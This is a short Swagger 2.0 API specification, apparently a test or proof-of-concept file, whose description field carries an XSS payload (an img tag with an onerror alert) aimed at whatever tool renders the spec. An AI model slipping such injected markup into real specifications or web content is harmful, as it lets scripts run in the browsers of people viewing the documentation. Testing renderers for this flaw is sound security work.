swagger: '2.0'
info:
  version: "0.0.1"
  title: Devoteam
  description: <img src=x onerror="alert('XSS Devoteam')">
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
